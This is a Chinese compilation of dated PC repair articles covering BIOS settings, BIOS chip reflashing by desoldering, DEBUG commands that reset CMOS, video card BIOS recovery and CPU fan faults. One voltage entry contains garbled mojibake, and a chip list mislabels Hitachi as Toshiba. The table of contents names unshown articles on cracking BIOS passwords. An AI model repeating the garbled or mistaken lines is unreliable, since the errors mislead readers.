    叮当点评：不少朋友都认为在杂牌显卡上使用知名品牌显卡的BIOS，会使显卡的性能大幅度提升，这是一种错误的认识。事实上，决定显卡性能的主要因素是显示芯片和显存的容量及速度。因此，如果你的显卡不存在稳定性方面的问题，请不要随便刷新显卡的BIOS。如果真的在刷新过程中出现了问题，文中介绍的方法能够帮您解决问题。


疑难BIOS设置

《一键清理系统垃圾》

疑难BIOS设置

[color=Blue]cpu drive strength
释疑：通过此项可以调整cpu到北桥芯片的驱动信号强度，设置为manual后可手动设置具体强度。超频后或老主板升级新cpu不太稳定时可以浓度改变此项数值。

cpu fast-strings
释疑：pentium pro在打开fast-strings后会有一个小bug，此时它与某些软件存在一些兼容性问题。关闭cpu fast-strings可以解决这种兼容性问题。不过关闭此项将影响cpu的l1 cache性能。目前的cpu已经不存在fast-strings方面的问题了，所以建设此选项设置为enabled

mps revision
释疑：mps是multi processor specification（多处理器规格）的缩写，这个设置只在系统中拥有两个或多个cpu或虚拟处理器时才有意义。mps有1.1和1.4两个版本。对于支持多处理器的win 2000及以后的操作系统可以完全兼容mps 1.4。而对于win nt及更古老的操作系统，则必须选择1.1版本。如果设置错误会导致第二个处理器关闭。

hyper threading function
释疑：即打开intel p4-c处理器的超线程功能。打开超线程功能的基本要求是cpu及芯片组支持超线程技术，且bios及操作系统对超线程也要支持。打开hyper threading时，操作系统建设使用win xp或linux 2.4。在其它不支持或对hyper threading支持不够好的操作系统中，打开超线程反而会导致系统性能下降。

cpu thermal-throttling
释疑：当cpu过热时，保护机制打开启后会让cpu强行处于一种空闲模式。而我们要设置的，就是cpu的空闲时间占cpu全部运算时间的百分比。此项设置得越高，cpu温度下降的越快。

delay prior to thermal
释疑：此项用于p4系统。属于一种过热保护功能。当p4的内核温度达到警戒值后，cpu的主频会自动降到一个很低的数值。此项就是用来设置p4在该降频模式下停留的时间。选择值有4、8、16、32分钟。cpu处于降频模式是难以接受的，所以我们必须加强cpu的散热措施，并注意扣紧散热片的扣具，不要忘记插接风扇的电源插头。

p2c/c2p　concurrency
释疑：打开或关闭pci to cpu 以及cpu to pci的并行数据传送功能，如果禁用本项，在某个pci操作周期内传输通道将被cpu指令或传出的数据独占。

md driving strength
释疑：这是设定内存到北桥芯片的内存控制器之间的驱动信号强度，如果内存工作不稳定，除了设置内存相关参数外，还可以将此项设为hi。

usb 2.0 hs refer. voltage
释疑：此项用于设置usb 2.0控制器的基准电压。采用usb 2.0接口的设备很容易出现无法找到设备。数据丢失，接上设备后系统蓝屏等现象。此时可以试试改变usb 2.0控制器的基准电压。设置选项有low、medium、high及max四种。

usb 1.1 device legacy support
释疑：如果需要在不支持usb或没有usb驱动的操作系统中中使用一些usb设备，如dos和unix，则需要打开此项。设置选项有：disabled、no mice及all device三种。no mice支持在dos下使用usb设备，但不支持usb鼠标；all device则支持在dos下使用包括鼠标在内的usb设备。如果有usb接口的鼠标或键盘，或想从usb接口的设备引导系统，则必须设置为all dveice。

usb 1.1 port 64/60　emulation
释疑：即usb端口64/60仿真设置。当此功能被启用时，usb键盘可以倒入一些特殊的组合键。

agp read synchronization
释疑：agp 8x标准中加入了同步设计（synchronization schemes）。因为agp 8x设备、cpu、以及其它的设备都有可能存取系统主内存中的某些数据，同步设计就是为了防止一个设备已经更改其中的数据而另一个设备试图再次去访问的情况的发生。建议将此项设为enable。

agp driving control
释疑：本项可用于指定agp显卡至北桥间的驱动电流信号强度。一些agp显卡需要比正常电流更强的驱动电流才能工作，特别是在高负荷工作时，选择manual后可以手动设置具体驱动信号强度，从而改变agp系统的稳定性。

re-callvga bios at s3 resuming
释疑：打开此设置项后，当系统从s3模式的睡眠状态唤醒时，允许bios根据vga bios信息初始化显卡。如果禁用此功能，系统从睡眠状态被唤醒的时间将会缩短，但是系统就需要通过驱动程序来初始化显卡。如果显卡的驱动不支持唤醒后初始化功能，那么显示系统将无法正常工作。建议将此项设为enable。

graphic window wr combine
释疑：此项主要见于一些采用sis芯片组的主板上。它可以打开图形地址的联合写功能，从而增强显示子系统的性能。但有些显卡在打开此项后容易出现兼容性问题。

ddr termination vol(v)
释疑：大家很关注内存的工作电压，现在很多主板都提供了ddr内存工作电压的设置项。不过还有一种与内存相关的电压值也会影响内存的工作，即ddr内存的总线终端电压(ddr bus termination vol)。ddr- 〉谋曜甲芟咧斩说缪刮 1.25v，通过此项我们还可以设置为1.27v或1.29v。

fast r-2-r turnaround
释疑：任何一个对内存的读请示都可以中断内存的连继读取操作。读操作到另一个读操作之间的最小间隔是1个时钟周期。选择enabled可以缩短读操作到读操作之间的转向时间，从而提升系统性能。不过，某些内存在打开此项后会使系统不稳定。

ddr dqs input delay
释疑：ddr内存在dram阵列和数据传输通道之间有一个特殊的逻辑部件，这个叫dqs(data strobe)的部件产生的脉冲信号使得内存数据输出与外部时钟信号同步。数据在输出时不必等待下一个外部时钟的上升沿。简单地说，就是用dqs信号来啬一个特殊的时钟上沿，而这个时钟上沿与外部时钟的下沿相对应。写入数据时，由芯片组的内存控制器产生dqs信号，使数据输入与时钟同步，实现在外部时钟上下沿均可写入。通过ddr dqs input delay选项我们可以设定dqs的延迟时间，主要用于增加系统的稳定性。

spread spectrum
释疑：当主板上的时钟震荡发生器工作时，脉冲的尖峰会产生emi（电磁干扰）。spread spectrum（频展）设定功能可以降低脉冲发生器所产生的电磁干扰，脉冲波的尖峰会衰减为较为平滑的曲线。如果我们没有遇到电磁干扰问题，建议将此项设定为disabled，这栏可以优化系统的性能表现和稳定性；否则应该将此项设定为enabled。如果对cpu进行超频，必须将此项禁用。因为即使是微小的脉冲值漂移也会导致超频运行的cpu锁死。

machine mac(nv) address
释疑：mac是指网卡的物理地址。一般来说，每块网卡的mac地址是唯一的。以太网交换机可以根据信息包中的mac源地址和mac目的地址实现数据包的交换和传递，mac由六个字节的二进制（12位十六进制）组成，前面三个字节表示厂商的编号，后面三个字节表示网卡的编号。nforce 2集志的网卡在正确安装驱动后，如果无法工作，很可能是没有设置mac地址。在bios中将此项设为enable后，在mac (nv) address input项中输入12位十六进制的数字即可。


用“硬”手段重写BIOS芯片

《一键清理系统垃圾》

用“硬”手段重写BIOS芯片

这几天笔者在改造一块RAID卡，需要把它的BIOS代码加入到主板BIOS中去，用的工具是CBROM，它可以添加或删除BIOS数据文件中的内容。试了几个不同版本的代码，都不能正常使用这块卡，分析BIOS代码的内容，看到其中的VRS这项不顺眼，一定是它在搞鬼，于是运行CBROM删掉了主板BIOS中的VRS这一项，然后用AWDFLASH把新代码写回到BIOS芯片中去后，重新启动机器，按开关后有“嘀”的一声，显卡加载有显示，别的就没有反应，键盘死锁。
    经分析，对付这种BIOS损坏情况，有下列几种办法：
    1.最常用的是热插拔。
    2.使用编程器写入BIOS代码，写好后，插回去，也能恢复正常。
    3.在主板BIOS内容损坏不多时，还可以“盲刷”，在软驱插入启动软盘从软盘启动，带有刷新程序和BIOS代码，执行AWDFLASH XXXX.BIN /SN /PY，等上30～60秒，重新启动机器。
    4.如果有ISA的显示卡，就不用“盲刷”了，插上ISA显卡，刷新过程和3一样，就能看着刷新过程了，前提是机器还要能读软盘。
    打开机箱，看我的主板，一块BX主板，最倒霉的是BIOS是PLCC封装的（小方块形状的，32根脚，和普通的那种BIOS芯片兼容，见附图），而且是焊死在主板上的，这下怎么办？驱猫上网找了很多硬件网站，理出了几个方案：
    1.买个双BIOS装上，但要100两银子，这个要等一周，时间也太长，还要切断BIOS一条控制线，芯片座反扣在芯片上，也不一定可靠接触，实在不行就只好用这个。
    2.把BIOS焊下来，用编程器或到别人主板上刷入代码，然后焊回来。
    3.在3的基础上焊上一个PLCC芯片座，一劳永逸，但是PLCC表面封装的芯片座较难找。
    经过分析决定采用方案2，如果找到PLCC表面封装的芯片座就用方案3。这样一劳永逸，以后不会再有担心的了，而且省银子。
    难度最大的是焊下BIOS芯片，普通电烙铁焊下来是不可能的，得用热风枪。抽空去了趟哈尔滨，购买所需工具，热风枪倒是有卖的，可是太贵了，最便宜的也要300至400两银子，还有一种吹塑料的热风枪，只要60元，当即买下。然后找表面封装的PLCC芯片座，找遍了科技市场，也没见到它的影子，不过在一家卖单片机的公司找到了一个PLCC到DIP的转换板，一阵讨价还价后15两银子成交，心里一阵窃喜（有人说这个东东要好几百，虽然这个简单了点，但和编程器配合起来就可以刷BIOS了，太超值了！）。
    我的英特尔82558网卡上面有个空的表面封装的PLCC芯片座，是留给启动芯片的，正好兼容我的BIOS，真是好运气，先把它取来。固定好网卡，把热风枪打开，调到第“8”挡，大概400℃左右，左手用镊子夹好芯片座，右手用热风枪对着它的焊脚部分转动吹（保证加热均匀），也就三四秒钟吧，芯片座应声而下，仔细一看，塑料的芯片座有点软化的迹象，不过主框架还是好的，没有问题，可以用。在取主板上BIOS芯片之前我用马口铁剪了个“帽子”把我的BIOS芯片挡住（这样它就不会被吹坏了），剪了一圈马口铁围墙，把BIOS这区域围起来（免得热风烫坏了周围的塑料部件），然后开始动手，三四秒就拿下来了。
    最后用电烙铁把BIOS芯片、主板上BIOS的管脚部分和网卡上管脚部分剩余的焊锡清理干净（注意拔下电烙铁电源，以免静电损坏元件），为了不让热风枪再损坏芯片座，我决定用手工焊接芯片座到主板上，而不用热风枪把它焊上去，这个过程仔细一些就可以了，焊之前把主板上BIOS的管脚部分与主板的ISA接口的连接线路用万用表测量记录下来（几乎BIOS的每个管脚都接到ISA接口上，除了22脚和第1脚，这两脚一个是片选脚，一个是空脚，单独测量22脚的连接关系就行了）。焊完之后，用万用表对着刚才的连接线路仔细测量一遍，没有问题，主板BIOS芯片终于有“家”了！
    把BIOS芯片放入转换板，一起夹在编程器的管脚座上，启动刷新程序，1分钟后，BIOS带着新的内容回到了主板上的“家”中，开机，久违的蓝天白云又出来了！


在Award或AMI的网站里为何没有我的BIOS的升级文件 ？

《一键清理系统垃圾》

在Award或AMI的网站里为何没有我的BIOS的升级文件 ？

     Award和AMI会为特定的主板生产商提供符合特定主板和芯片组的BIOS升级文件，然后生产商再利用Award/AMI提供的工具，对这些BIOS文件作出最后的修改和优化。也就是说，生产商比Award/AMI更了解他们的主板，能提供更好的BIOS升级。 </P><P>注意：在http://www.award.com.tw/download/bios/里包括了好多主板如ali、cyrix、intel、opti、sis、via的BIOS升级文件。不过你最好先在主板生产商自己的网页里找升级文件，如果没有的话，才来此处下载。 </P><P>PROM，EPROM，EPROM这些名词代表什么 ？ </P><P>PROM（可编程只读存储器programmableread-onlymemory）是数据只可写入一次的存储器芯片。一旦数据写入到PROM，就永久保存。不象PC系统里的内存，PROM在关机时里面的信息依然保存。 </P><P>PROM和ROM（只读存储器）的差异是PROM生产出来后是空白的存储器，而ROM在生产出来后就已经被写入信息了。要想写入到PROM，需要特殊的设备--PROM编程器或PROM烧录器。 </P><P>EPROM（可擦除可编程只读存储器erasableprogrammableread-onlymemory）属于特殊的一种PROM。内部的信息可以用紫外线来擦除。一旦擦除后，就可以被写入信息。 </P><P>而EEPROM和PROM类似，但擦除时需要电而不是紫外线。EEPROM（电擦除可编程只读存储器electricallyerasableprogrammableread-onlymemory）和PROM一样，关机后信息不会消失，没有RAM快。 </P><P>一种特殊的EEPROM，称之为FlashEEPROM，在电脑里可以被重写，不再需要特殊的烧录器。我们常说的可读写式BIOS的芯片就是有它们构成的。


在DEBUG里如何恢复BIOS的出厂值？

《一键清理系统垃圾》

在DEBUG里如何恢复BIOS的出厂值？

1、针对AMI/Award BIOS

C：（在纯DOS下，不是windows里的DOS窗口）

-O7017

-O7117

Q

2、针对Phoenix BIOS

C:（在纯DOS下，不是windows里的DOS窗口）

-O70FF

-O7117

Q


怎么确定系统里是可擦写的BIOS

《一键清理系统垃圾》

怎么确定系统里是可擦写的BIOS

     很简单，把机箱打开，揭开BIOS芯片上（一般是28或32脚的双列直插式集成电路，上面是贴的是印有BIOS生产商的封条）的封条，可以看到芯片的型号。对照下面，你就可以确定系统里是否包含可擦写的BIOS。 </P><P>Am29F010：AMD5伏的FlashROM </P><P>Am28F010，Am28F010A：AMD12伏的FlashROM </P><P>AT28C010，AT28MC010，AT29C010，AT29LC010，AT29MC010：Atmel5伏的FlashROM </P><P>CAT28F010V5，CAT28F010V5I：Catalyst5伏的FlashROM </P><P>CAT28F010，CAT28F010I：Catalyst12伏的FlashROM </P><P>28F010：Fujitsu（富士通）12伏的FlashROM或ISSI12伏的FlashROM </P><P>HN58C1000：Hitachi（东芝）5伏的FlashROM </P><P>HN28F101，HN29C010，HN29C010B，HN58C1001，HN58V1001：Hitachi（东芝）12伏的FlashROM </P><P>A28F010，28F001BX-B，28F001BX-T，28F010：Intel12伏的FlashROM </P><P>M5M28F101FP，M5M28F101P，M5M28F101RV，M5M28F101VP：Mitsubishi12伏的FlashROM </P><P>MX28F1000：MXIC12伏的FlashROM </P><P>MSM28F101：OKI12伏的FlashROM </P><P>KM29C010：Samsung5伏的FlashROM </P><P>DQ28C010，DYM28C010，DQM28C010A：SEEQ5伏的FlashROM </P><P>DQ47F010，DQ48F010：SEEQ12伏的FlashROM </P><P>M28F010，M28F1001：SGS-Thomson12伏的FlashROM </P><P>28EE011，29EE010：SST5伏的FlashROM </P><P>PH29EE010：SSTROMChip-可擦写（Flashable） </P><P>TMS29F010：Texas-Instr.5伏的FlashROM </P><P>TMS28F010：Texas-Instr.12伏的FlashROM </P><P>W29EE011：Winbond5伏的FlashROM </P><P>W27F010：Winbond12伏的FlashROM </P><P>X28C010，X28C010I，XM28C010，XM28C010I：XICOR5伏的FlashROM </P><P>29LVxxx-3VFlashmemory（较少见） </P><P>28Cxxx-EEPROM，和Flashmemory相似 </P><P>27Cxxx-Withwindow.EPROM：只读，一次性写入。 </P><P>其它型号开头的字母不是28或29的芯片可能就是普通的ROM。


拯救BIOS刷新失败的显卡

《一键清理系统垃圾》

返回总目录 上一页 目录页

拯救BIOS刷新失败的显卡

一日，朋友气喘吁吁地抱着爱机来到我家，说是显卡坏了，原因不明。

    我打开机箱看了看显卡是MGA G200，仔细观察后确定显卡没有任何烧伤的痕迹，为了进一步验证显卡是否损坏，我把它拔下来，仔细地清理了一遍，然后插到我的主板上，通电开机，计算机开始启动，但是屏幕不亮……有一定维修经验的DIYer就会想到，不小心把显卡BIOS刷坏时，就是这种状况。

    我问他是否刷新过显卡的BIOS，他说不知道，但上初中的儿子折腾了一个周末，也有可能。我估计是显卡BIOS刷坏了。初步确定原因后，打算先刷新一遍显卡BIOS试试看。换上自己的MGA G400显卡，启动电脑，到驱动之家搜索一下，下载了MGA G200/G400/G450/G550显卡最新的BIOS文件及刷新工具，解压缩出一大堆文件，其中有个pbioswin.exe，看起来是在Windows下升级BIOS用的，运行后选择第一项可以在Windows下升级显卡的BIOS，选择第二项是创建紧急启动盘。为保险起见，插入一张干净的优质软盘，做了一张紧急启动盘，然后拿我的G400显卡做试验。

    用这张软盘启动，过了大约20秒钟，启动完成后，却没有开始自动刷新显卡BIOS，而是出现了DOS提示符，用“dir”命令查看了一下软盘的内容，把所有可执行的文件都运行了一遍也没效果，难道文件不对？重新启动计算机查看了一下解压缩出来的那堆文件，有一个pbiosdos.exe，看起来像是用来在DOS下刷新显卡BIOS的，由于不知道具体要用到哪些文件，干脆把所有文件都复制到了C盘根目录下，然后重新启动计算机，进入纯DOS模式，这时默认路径就是C：\，直接输入“pbiosdos”，程序提示是否真的要刷新，按回车键继续，过了4~5秒钟，刷新完成，重新启动计算机，一切正常。试验好以后，决定摸黑刷新损坏的G200显卡。

    换上了G200，启动后不停地按F8键，20秒过去了，估计已经出现了启动菜单，按下数字键“5”（进入纯DOS模式），回车，看着键盘输入pbiosdos（屏幕没显示啊:)），又按了一下回车键，等了两分钟，估计刷两次也该完了，于是重新启动计算机……激动人心的时刻出现了，屏幕不负所望亮了起来，进入Windows 98，16色的……赶紧把显卡换到朋友的计算机上，启动后一切正常，显卡“复活”了。


blos

《一键清理系统垃圾》

返回总目录

blos

◎AMI BIOS 自检响铃含义
◎Award BIOS 自检响铃含义
◎AWARD BIOS设置详解
◎BIOS 设置详解
◎BB是报警的声音
◎BIOS报警详解
◎开机BIOS语言
◎BIOS的设置及其影响
◎BIOS可以被映射
◎BIOS设置引起的软件安装故障
◎BIOS设置中硬盘模式的含义
◎BIOS升级失败的恢复方法
◎BIOS升级失败的原因及处理办法
◎BIOS是否需要更新？
◎◆ BIOS ROM checksum error-System halted
◎bios万能密码法
◎BIOS问答
◎BIOS详解
◎BIOS信息详解
◎BIOS与CMOS区别
◎BIOS中英文对照表
◎BIOS自检报错信息
◎BIOS自检响铃含义
◎CMOS开机密码解密集锦
◎CMOS开机密码解密集锦
◎CMOS密码清除方法
◎Phoenix BIOS 自检响铃含义
◎打造自己的BIOS万能密码
◎读懂主板BIOS的语言
◎改进热插拔修复BIOS的方法
◎各厂牌笔记本电脑进入BIOS方法
◎更改BIOS设置发挥显卡性能
◎关键时刻还是BIOS自检铃声助我解决疑难
◎经典故障：BIOS、CMOS常见疑难集锦(二)
◎经典故障：BIOS、CMOS常见疑难集锦(一)
◎开机BIOS语言一点通
◎另类的BIOS与内存冲突故障
◎另类维修BIOS
◎让MODBIN打造个性化BIOS
◎BIOS有问题而又找不到升级文件
◎如何进入BIOS设置?
◎如何破解BIOS里的密码保护？
◎如何升级我的BIOS？
◎如何优化电脑系统的BIOS？
◎如何在DOS下自动刷新BIOS
◎软驱故障与刷新BIOS
◎什么是BIOS 2
◎什么是CMOS
◎什么是可擦写（Flash）的BIOS？
◎通过CMOS设置定时开机
◎突破BIOS容量的一致性检查
◎我需要升级BIOS吗？
◎显卡BIOS刷新失败后的处理方法
◎疑难BIOS设置
◎用“硬”手段重写BIOS芯片
◎在Award或AMI的网站里为何没有我的BIOS的升级文件 ？
◎在DEBUG里如何恢复BIOS的出厂值？
◎怎么确定系统里是可擦写的BIOS
◎拯救BIOS刷新失败的显卡

www.163164.com 下载:《一键清理系统垃圾》程序，保持系统的“苗条”身材与运行速度！

返回总目录


AMD Athlon64处理器实际运行频率换算公式

《一键清理系统垃圾》

返回总目录 目录页 下一页

AMD Athlon64处理器实际运行频率换算公式

    AMD将分别于6月14日和16日发布Athlon 64 3100+和3400+芯片。硬件爱好者可以根据以下公式和产品代码，自行推算Athlon 64芯片的工作频率。
    如Athlon 64 2800+，其处理器的工作频率为1.6GHz，也就是：
（处理器工作频率*3）/2+400 =1600*3/2+400=2800
    所以，Athlon 64 3100+和3400+的工作频率为1.8GHz和2.0GHz。


CPU的散热问题故障两例

《一键清理系统垃圾》

CPU的散热问题故障两例

  实例一 近日笔者在清理电脑内部尘土时发现了一个要命的隐患：CPU风扇没有端端正正地紧贴在CPU上，而是有点倾斜。仔细观察发现，散热器的底部有一小部分压在了CPU插槽的高埂上，没有与CPU的核心芯片完全接触。这怎么了得，幸好现在气温不是很高，否则这块CPU早就一命呜呼了。于是我赶紧将风扇取下，在CPU核心芯片上涂上硅胶，小心翼翼地将风扇装上。事后想起前些天在拆除光驱时，由于CPU风扇碍事就将其摘了下来。可能在安装时太马虎，将其位置放偏了，这为日后使用埋下了隐患。

    实例二 单位一同事新组装一台电脑，技术人员刚走不到一个小时就叫我过去看，说电脑一玩游戏就死机，是不是大问题？到了他家，他说今早去电脑公司装机，装机的人很多，技术人员很忙。他这台电脑的配置是P4 2.0GHz，主要用来玩游戏。

    电脑安装的是Windows 98操作系统，随便点了几个办公软件，运行还是很正常。打开装在硬盘里的《抢滩登陆》游戏，第一关还没打完，游戏的速度越来越慢，最后黑屏（幸亏是Intel的P4 CPU，它有监控温度自动降频的功能，如果是AMD的CPU，估计就烧了）。这回不玩游戏，只是用来打字，结果半小时之后又死机了。

    看来是硬件问题，首先怀疑是硬盘的问题，拆下硬盘拿到别的机子试验，运行正常，打字，玩游戏近一个小时都没事。是什么问题呢？新机按理各种配件都是正常的，又一次打开机箱，认真查看里面的各种插拔件，突然发现压在CPU上面风扇的扣环没扣上，好危险呀！急忙把它扣上，又重新开机，运行，一切都正常。

    点评：对于我们DIYer来说的，电脑的隐患要引起注意。首先就是CPU的散热，天气冷的时候，CPU的发热问题也许会被掩盖，可是现在天气一天比一天热起来，隐患也越来越严重。上面两个实例都是因为CPU的散热风扇没有安装好而出现了一些问题，建议大家赶紧检查一下自己的散热系统，把隐患排除。


CPU断脚后的处理方法

《一键清理系统垃圾》

CPU断脚后的处理方法

    CPU是件很娇贵的电脑配件，可能会因为运输和保养不当，以及众多DIYer们在超频过程中，不小心把CPU的脚折断了。尽管其内部电路完好无损，难道就因无法使用而被判成“死刑”吗？其实没这么严重，笔者通过实践，总结了两种方法，特介绍给大家。
    首先，大家要准备好20W的电烙铁一把，将铬铁头磨尖，以方便焊接，并注意烙铁应有良好的接地，如果没有接地只能在拔去烙铁插头后利用余热焊接，否则CPU有被感应电击穿的危险。
#1　　方法1：引脚焊接法
    1.将CPU断脚处的表面刮净，用焊锡和松香对其迅速上锡，使焊锡均匀地附在断面上即可。
    2.将CPU断脚（如果丢失，可用大头针或电子元件的引脚代替）刮净，用同样的方法上锡。
    3.用双面胶将CPU固定在桌面上，左手用镊子夹住断脚，使上锡的一端与CPU断脚处相接，右手用电烙铁迅速将两者焊接在一起，可多使用一些松香，使焊点细小而光滑。
    4.将CPU小心地插入CPU插座内，如果插不进去，可用刀片对焊接处小心修整，插好后开机测试。
#1　　方法2：直接连接法
    1.取5至15厘米长（长度视情况而定，如果CPU是用转接卡转接的，当然是取短一点了，总之越短越好！）直径0.2毫米左右的漆包线（可以从坏的变压器中获得），用同上的方法将其一端焊在CPU的断脚处，要求焊点平且小。
    2.将CPU插入CPU座（或转接卡）中，使漆包线从两者之间的缝隙中引出。
    3.仔细观察主板CPU座（或转接卡）的背面，发现有许多成行成列的小焊点，排列与CPU的相对应，找到与断脚相对应的焊点，将漆包线的另一端小心地焊上去即可。
    4.检查焊接确实无误后，装机、打开电源，屏幕显示CPU被侦测到，修复成功！
    以上两种方法笔者对一断了三只脚的“赛扬366”修复成功，使用大半年了，一切正常！


CPU风扇引发的系统启动异常

《一键清理系统垃圾》

CPU风扇引发的系统启动异常

    近日，朋友急冲冲地找到我，称他的电脑无法正常启动了。开机后显示器无法点亮，PC喇叭不停地发出报警声。
        笔者首先想到可能是配件长期使用后因松动所致，于是断开所有电源，将显卡 、CPU和内存条拔下后，再小心翼翼地重新插好。再次开机，显示器仍然无法点亮。笔者又对硬盘数据线和软、硬盘的I/O部分做了认真地检查，也没有发现任何松动的迹象。难道是线路上接触不良？于是用试电笔，对各个接口部分进行了测试。可是，也未发现任何短路及接触不良的情况。
        笔者连忙询问朋友有关电脑近期的使用情况。朋友说，他只是在前几天给CPU更换了一款大功率的散热风扇，而换上新风扇后就出现了这种情况。但风扇是在电脑城里试过的，用在别人的电脑上时没有出现任何问题。
        第二天，笔者将自己的CPU风扇“首席冷冻官”拆下，再次来到朋友家中。报着试一试的想法，将朋友的CPU散热风扇拆下，换上笔者自己的。开机后一切恢复正常！看来整个事件的“罪魁祸首”还是朋友那块新买的CPU风扇！
        鉴于朋友使用的是微星6163BX主板，笔者突然想到该系列的主板是带有风扇测速功能的。笔者猜想，是不是朋友新换上的风扇不支持这种测速呢？于是笔者进入到该主板的BIOS设置，看到风扇测速功能果然是开启的！连忙将风扇测速项关闭，关机后重新换上朋友的那块散热风扇。不出笔者所料，这回一切正常！这样，一切都“柳暗花明”了──对于不带风扇测速功能的主板，使用朋友那种新买风扇就不会出现问题；而对于带有此功能的主板，将CPU风扇测速功能关闭也可以避免故障的发生！
        所以提醒各位朋友，在遇到此类问题而用其它方法又不能奏效时，不妨从硬件的搭配入手，看看新购配件是否存在不支持某种特殊功能的情况──如本例CPU风扇不支持主板测速功能。这样或许能使看似棘手的问题“迎刃而解”呢！


CPU风扇引起电脑工作不稳定一例

《一键清理系统垃圾》

CPU风扇引起电脑工作不稳定一例

    我家里有一台电脑（CELERONⅡ 566、MATROX九代20G、华硕P3B-F主板、现代64M PC100 SDRAM、小影霸TNT2），机器自上半年配好后一直工作正常。

    最近，在开机时，经常听到机箱内风扇运转时发出杂音，开始认为不过是风扇磨损或润滑不良造成的，对机器的正常运行没有任何影响，就没有太在意。但不久，问题出现了。起初只是在运行程序时不时出现非法操作，后来干脆在运行大型程序时就死机了。初步判断认为WINDOWS系统出了问题，重装系统后，问题依然存在。看来多半是硬件的问题了，内存的嫌疑最大。从同事处借来一条64M内存，换下后，启动运行大型程序仍会出现死机现象。逐一拔插板卡，还是解决不了问题，百思不得其解......是不是和CPU风扇有关系，带着饶幸心理（顺便也解决一下风扇嗓音问题），我取下风扇加上润滑油，装回机器。开机，嗓音明显减小，运行程序十几分钟后，没有出现死机现象，惊喜之余，拿出雷神Ⅲ反复运行数小时后，没有出现任何问题。

    分析：引起电脑死机的情况很多，其中内存是最薄弱的环节。比如，接触不良、内部存储信息受到干扰、内存质量不过关等。本例情况属于内存受到CPU风扇运转产生的电磁干扰造成的。因为CPU风扇距内存较近，当风扇运转不良时，除产生较大嗓音外，还会产生较强的电磁杂波，使内存的储存信息受到破坏，从而造成了电脑的工作不正常甚至死机。


CPU资源占用100％解决方法

《一键清理系统垃圾》

CPU资源占用100％解决方法

1、驱动没有经过认证，造成CPU资源占用100％。大量的测试版的驱动在网上泛滥，造成了难以发现的故障原因。

2、防杀毒软件造成故障。由于新版的KV、金山、瑞星都加入了对网页、插件、邮件的随机监控，无疑增大了系统负担。

3、病毒、木马造成。大量的蠕虫病毒在系统内部迅速复制，造成CPU占用资源率据高不下。解决办法：使用最新的杀毒软件在DOS模式下进行杀毒。经常性更新升级杀毒软件和防火墙，加强防毒意识，掌握正确的防杀毒知识。

4、控制面板—管理工具—服务—RISING REALTIME MONITOR SERVICE点鼠标右键，改为手动。

5、关闭瑞星软件的“硬盘定时备份”项。卸载现有的瑞星程序，然后下载最新完整升级包，用WINRAR解开以后再安装。

6、开始－＞运行－＞msconfig－＞启动，关闭不必要的启动项，重启。

7、查看“svchost”进程。

    Svchost.exe是Windows XP系统的一个核心进程。Svchost.exe不单单只出现在Windows XP中，在使用NT内核的Windows系统中都会有Svchost.exe的存在。一般在Windows 2000中Svchost.exe进程的数目为2个，而在Windows XP中Svchost.exe进程的数目就上升到了4个及4个以上。

    如何才能辨别哪些是正常的Svchost.exe进程，而哪些是病毒进程呢？

     Svchost.exe的键值是在“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Svchost”，每个键值表示一个独立的Svchost.exe组。

    微软还为我们提供了一种察看系统正在运行在Svchost.exe列表中的服务的方法。以Windows XP为例：在“运行”中输入：cmd，然后在命令行模式中输入：tasklist /svc。系统列出服务列表。如果使用的是Windows 2000系统则把前面的“tasklist /svc”命令替换为：“tlist -s”即可。

    如果你怀疑计算机有可能被病毒感染，Svchost.exe的服务出现异常的话通过搜索Svchost.exe文件就可以发现异常情况。一般只会找到一个在：“C:\Windows\System32”目录下的Svchost.exe程序。如果你在其他目录下发现Svchost.exe程序的话，那很可能就是中毒了。

     还有一种确认Svchost.exe是否中毒的方法是在任务管理器中察看进程的执行路径。但是由于在Windows系统自带的任务管理器不能察看进程路径，所以要使用第三方的进程察看工具。

     上面简单的介绍了Svchost.exe进程的相关情况。总而言之，Svchost.exe是一个系统的核心进程，并不是病毒进程。但由于Svchost.exe进程的特殊性，所以病毒也会千方百计的入侵Svchost.exe。通过察看Svchost.exe进程的执行路径可以确认是否中毒。

8、查看网络连接。主要是网卡。

9、把網卡、显卡、声卡卸載，然後重新安裝一下驱动。

10、重装系统、常用软件、当然也要装驱动，用几天看一下。若不会出现这种问题，再装上其他软件，但是最好是一个软件装完，先用几天。现会出现问题再接着装！


Windows XP中使用鼠标右键引起CPU 100%占用问题的解决

《一键清理系统垃圾》

Windows XP中使用鼠标右键引起CPU 100%占用问题的解决

    前不久的报到说在资源管理器里面使用鼠标右键会导致CPU资源100％占用， 微软现在Support站点提供了暂时的解决方法。

Microsoft Knowledge Base Article - 819101
原文： http://support.microsoft.com/default.aspx?scid=kb;en-us;819101
临时性的性能降低当你在Windows资源管理器里面使用鼠标右键点击文件或目录的时候

受影响的操作系统：

Microsoft Windows XP Home Edition

Microsoft Windows XP Professional

Microsoft Windows XP Home Edition SP1

Microsoft Windows XP Professional SP1

Microsoft Windows XP Home Edition SP1a

Microsoft Windows XP Professional SP1a

征兆：
在资源管理器里面，当你右键点击一个目录或一个文件，你将有可能出现下面所列问题：

任何文件的拷贝操作在那个时间将有可能停止相应

网络连接速度将显著性的降低

所有的流输入/输出操作例如使用Windows Media Player听音乐将有可能是音乐失真
成因：
当你在资源管理器里面右键点击一个文件或目录的时候，当快捷菜单显示的时候，CPU占用率将增加到100％，当你关闭快捷菜单的时候才返回正常水平。

解决方法：
方法一：关闭“为菜单和工具提示使用过渡效果”
1、点击【开始】－－【控制面板】
2、在【控制面板】里面双击【显示】
3、在【显示】属性里面点击【外观】标签页
4、在【外观】标签页里面点击【效果】
5、在【效果】对话框里面，清除“为菜单和工具提示使用过渡效果”前面的复选框接着点击两次【确定】按钮。

方法二：在使用鼠标右键点击文件或目录的时候先使用鼠标左键选择你的目标文件或目录。然后再使用鼠标右键弹出快捷菜单。


解决AGP显卡与AMD CPU冲突一法

《一键清理系统垃圾》

解决AGP显卡与AMD CPU冲突一法

    在Windows 2000及Windows 98 SE操作系统下，AMD的钻龙与雷鸟在搭配nVIDIA GeForce256及Matrox G400显示卡时，在运行程序中常会发生死机现象，令众多读者为之苦恼。笔者经多方查证试验，终于找到了一个解决的方法，不敢独享特拿出与各位分享（可惜的是这些方法只对Win2000用户有效）。
    1.首先打开注册表编辑器Regedit32.exe。 
    2.然后在注册表中找到下列键值:HKEY_LOCAL_MACHINE\ SYSTEM\Current ControlSet\Control\Session Manager\ Memory Management
    3.在菜单中选编辑，再选添加数值，进行如下操作。
